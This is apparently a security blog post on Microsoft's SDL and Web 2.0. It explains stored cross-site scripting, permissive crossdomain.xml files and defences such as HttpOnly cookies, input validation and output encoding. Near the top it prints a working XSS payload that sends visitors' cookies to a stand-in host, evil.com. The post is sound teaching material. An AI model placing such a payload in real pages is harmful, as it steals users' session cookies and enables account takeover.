SDL and Web 2.0


Hi everyone, Bryan Sullivan here. 

Unless you’ve been living in an ice cave on the polar cap for the last month, you’ve heard about Microsoft’s proposed acquisition of Yahoo. George Hulme of InformationWeek wrote a very insightful column about the proposed acquisition and what it would mean for Yahoo’s Web 2.0 properties. My favorite quote from this column (probably my favorite quote from anyone’s column so far this year): “…there’s still much to do in the [software] industry to reach a level of truly sustainable computing. This is perhaps especially true in the nascent area of Web 2.0 development. Let’s hope Microsoft brings its Trustworthy Computing Initiative, or more precisely its Security Development Lifecycle to Yahoo, should the $45 billion deal come through.” That’s pretty high praise for the SDL, but what exactly does the SDL have to say about Web 2.0 development? To answer this question, let’s take a look at a couple of security issues that affect Web 2.0 applications and then dive into the corresponding SDL requirements.

Many Web 2.0 applications allow their end users to build and contribute to the application. Think about social networking sites like Facebook, or wikis like Wikipedia. The content on sites like these comes directly from the users themselves. (Remember that you were Time Magazine’s Person of the Year in 2006 for this very reason!) While this is very empowering for users, it does raise the question: If users can add their own content to a web site, what’s to prevent them from adding malicious content? Consider what would happen if Evil Eve adds the following HTML to a wiki entry:

<img src="x" onerror="(new Image()).src='http://www.evil.com/eve?'+document.cookie">

If the wiki accepts this content from Eve, then for anyone who views the entry, the broken image fails to load, the onerror handler runs in that visitor's browser, and his browser cookie is "stolen" and sent to Eve at evil.com. The cookie could potentially contain login credentials or other sensitive information, allowing Eve to impersonate her victim and essentially commit a form of identity theft.

The attack I’ve shown here is known as a persistent (or stored) Cross-Site Scripting (XSS) attack, and it is the most dangerous form of XSS since it doesn’t require any social engineering the way reflected and DOM-based XSS attacks do. The victim doesn’t have to do anything unusual – he just has to browse to an infected page, maybe even one he’s been to hundreds of times in the past. And in all likelihood, he’ll never even know he was a victim. The Samy worm, which infected MySpace in late 2005, exploited a persistent XSS vulnerability to silently spread through its victims’ profile pages. Less than a day after its release, Samy had spread to over one million MySpace users, forcing MySpace to shut the site down completely while the vulnerability was diagnosed and fixed.

 (As a side note, I’d like to point out that if the developers of the hypothetical wiki in the earlier example had used the HttpOnly attribute for their site cookies, Evil Eve would not have been able to steal those cookies. However, HttpOnly is just a defense-in-depth measure and not a complete solution for the inherent problem of end users being able to write malicious code into the web site.)
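
To make that side note concrete, here is a minimal sketch of how a server might mark its session cookie HttpOnly. It uses Node's built-in http module; the port, route, cookie name, and value are hypothetical examples of mine, not code from the wiki in question. With the flag set, the cookie is still sent on every request to the site, but document.cookie no longer exposes it to script injected into the page.

// Minimal sketch (TypeScript on Node): setting an HttpOnly session cookie.
// The cookie name and value are illustrative assumptions.
import * as http from "http";

const server = http.createServer((_req, res) => {
  // HttpOnly keeps document.cookie from revealing the value to page script;
  // Secure restricts the cookie to HTTPS connections.
  res.setHeader("Set-Cookie", "sessionId=abc123; HttpOnly; Secure; Path=/");
  res.end("Welcome to the wiki!");
});

server.listen(8080);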

Web mashups are another popular component of Web 2.0. The browser’s same-origin policy prevents web developers from writing client-based mashups (that is, mashups that don’t use a server proxy to request data from the individual sites being “mashed” together) in straight DHTML. Some Rich Internet Application (RIA) frameworks, notably Adobe’s Flash and Microsoft’s Silverlight, offer controlled mechanisms to relax the same-origin policy. For Flash, this mechanism is an XML policy file (crossdomain.xml) hosted at the root of a domain that lists the external domains whose Flash content should be granted access to that domain’s data. For example, if you host data at www.mysite.com and want Flash movies served from www.friendlysite.com to be able to read it, you would create a file www.mysite.com/crossdomain.xml with content as follows:

<cross-domain-policy>
   <allow-access-from domain="www.friendlysite.com"/>
</cross-domain-policy>

So far, so good. However, crossdomain.xml allows not just specific domain names in the allow-access-from element (i.e., “www.friendlysite.com”) but also wildcards (“*.friendlysite.com”). In fact, it will even allow wildcards that break the two-dots rule, like “*.com” or even just “*”. By publishing a highly permissive access list like this, a developer is essentially letting anyone on the Internet manipulate his objects and data. In an attack very reminiscent of the Samy worm, Chris Shiflett exploited a wildcard (“*”) allow-access-from entry in Flickr’s crossdomain.xml file to make any visitor to his web site automatically add him to their Flickr friends list. While this may not be the scariest attack you’ve ever heard of, imagine what might happen if a truly malicious user discovers the same vulnerability in the fund transfer functionality of a bank’s web site, or the securities trading functionality of a brokerage firm’s web site.

So, what does the SDL have to say about these issues? In terms of XSS prevention, the SDL offers a lot of guidance. The SDL requires the use of both input validation (making sure that user input conforms to a known good format – in the case of the wiki entry, to deny HTML and script content) and output encoding (making sure that any active content that gets past the input validation routines is rendered as harmless text and not executed). Internally, we also mandate the use of code analysis tools to find XSS vulnerabilities that might otherwise slip through the cracks. This is great advice for anyone developing web applications, whether they’re Web 2.0 or 1.0.
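
To illustrate what those two requirements can look like in practice, here is a small sketch of input validation and output encoding for the wiki scenario. The whitelist pattern and helper names are my own illustrative choices, not an API the SDL prescribes; a real application should prefer a vetted encoding library over hand-rolled helpers.

// Sketch (TypeScript): input validation plus output encoding for user-supplied wiki text.
// Validation: accept only a known-good format (plain text with basic punctuation).
function isValidWikiText(input: string): boolean {
  return /^[\w\s.,!?'"()-]{1,5000}$/.test(input);
}

// Encoding: anything that does reach the page is rendered as inert text,
// because HTML metacharacters are replaced with their entity equivalents.
function htmlEncode(input: string): string {
  return input
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Eve's payload fails validation; even if it somehow slipped through,
// encoding it would display the markup as text instead of executing it.
const submission = '<img src="x" onerror="alert(1)">';
if (!isValidWikiText(submission)) {
  console.log("Rejected submission:", htmlEncode(submission));
}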

As for cross-domain policy files, the SDL provides several recommendations. First is a simple attack surface reduction: if a site is not meant to be accessed by foreign domains, then any cross-domain policy files should be removed from the site. Second, if an application offers cross-domain access and also has functionality available only to authenticated users, then its cross-domain policy file must not contain overly permissive entries like “*” or “*.com”. It’s best to list specific domains wherever possible, or at least to follow the same two-dots rule that HTTP cookies have to follow for their domain specifications. This helps to limit the sites that can perform request forgery attacks like the Flickr attack mentioned earlier. If no applications anywhere on the site offer special functionality for authenticated users, then the SDL does permit the site to have a broad-reaching cross-domain access list. However, this does require constant oversight to ensure that no authenticated applications are added to the site at a later time. In my opinion, it’s safer just to lock down the list to exactly the sites that are necessary and no more.
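
As a rough illustration of that “lock it down” recommendation, here is a small sketch that fetches a site’s crossdomain.xml and flags entries that are “*” or that break the two-dots rule. The URL, the regex-based parsing, and the flagging rules are simplifications of my own for illustration; this is not an SDL tool or a complete audit.

// Sketch (TypeScript, Node 18+ or a browser): flag overly permissive crossdomain.xml entries.
async function auditCrossDomainPolicy(siteRoot: string): Promise<void> {
  const response = await fetch(`${siteRoot}/crossdomain.xml`);
  if (!response.ok) {
    console.log("No crossdomain.xml found - no cross-domain access is granted.");
    return;
  }
  const xml = await response.text();

  // Pull every domain="..." value out of the allow-access-from elements.
  const domains = [...xml.matchAll(/allow-access-from[^>]*domain="([^"]*)"/g)]
    .map((match) => match[1]);

  for (const domain of domains) {
    // Flag "*" and wildcards that break the two-dots rule (e.g. "*.com").
    const tooBroad = domain === "*" || /^\*\.[^.]+$/.test(domain);
    console.log(`${domain}: ${tooBroad ? "overly permissive" : "ok"}`);
  }
}

// Hypothetical usage:
auditCrossDomainPolicy("https://www.mysite.com").catch(console.error);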

Regardless of what happens between Microsoft and Yahoo, I agree with George that adoption of the SDL would benefit Yahoo’s Web 2.0 applications. In fact, I’ll take it a step further and state that adoption of the SDL would benefit anyone’s Web 2.0 applications. In my next SDL blog post, I’ll be addressing the trickiest aspect of implementing the SDL for Web 2.0: developing the “perpetual beta”.

Comments
  • "As a side note, I’d like to point out that if the developers of the hypothetical wiki in the earlier example had used the HttpOnly attribute for their site cookies, Evil Eve would not have been able to steal those cookies."

    I am by no means advocating that developers not use HttpOnly (it should always be set), but it should not be praised as a bulletproof method for keeping JavaScript from stealing the cookie, lest developers get cocky and make dumb decisions thinking their cookie is now safe. There is a method using XMLHttpRequest to read the cookie despite this protection.

    However, as there isn't a simple fix in light of that, I think the problem demonstrates why a thorough SDL would be of optimal use here; it would identify that risk and prescribe further effort to secure against that vector of attack.

    I look forward to the next article.  
